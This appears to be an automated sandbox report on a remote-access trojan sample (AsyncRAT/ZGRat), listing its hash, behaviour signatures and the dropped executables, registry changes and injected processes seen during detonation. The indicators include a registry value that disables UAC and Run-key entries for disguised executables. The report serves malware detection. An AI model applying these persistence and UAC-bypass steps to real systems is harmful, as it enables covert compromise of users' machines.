Malware Analysis Report

2025-08-10 19:33

Sample ID 231115-mtjpaahb4v
Target resources.exe
SHA256 f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Tags asyncrat zgrat operacert windefault evasion persistence rat trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

Threat Level: Known bad

The file resources.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat operacert windefault evasion persistence rat trojan

AsyncRat

UAC bypass

ZGRat

Detect ZGRat V1

Async RAT payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious use of FindShellTrayWindow

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Enumerates system info in registry

Modifies registry key

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 10:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 10:45

Reported

2023-11-15 10:57

Platform

win10v2004-20231025-en

Max time kernel

527s

Max time network

746s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunihaiVersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Music\RunNihaiersion.exe N/A
N/A N/A C:\Users\Public\Music\israil.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Public\Music\israil2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2WinDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe N/A
N/A N/A C:\Users\Public\Music\RunNihaiersion.exe N/A
N/A N/A C:\Users\Public\Music\israil.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Public\Music\RunihaiVersion.exe N/A
N/A N/A C:\Users\Public\Music\israil2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2WinDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\c:\users\public\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\public\music\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\public\downloads\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\admin\downloads\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\admin\desktop\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5532 set thread context of 5628 N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5312 set thread context of 4908 N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5404 set thread context of 2748 N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5284 set thread context of 5460 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4908 set thread context of 4824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5688 set thread context of 3496 N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5260 set thread context of 5556 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4240 set thread context of 1084 N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4424 set thread context of 5336 N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4908 set thread context of 2192 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1084 set thread context of 5768 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2560 set thread context of 4336 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 756 set thread context of 3884 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133445190141227845" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
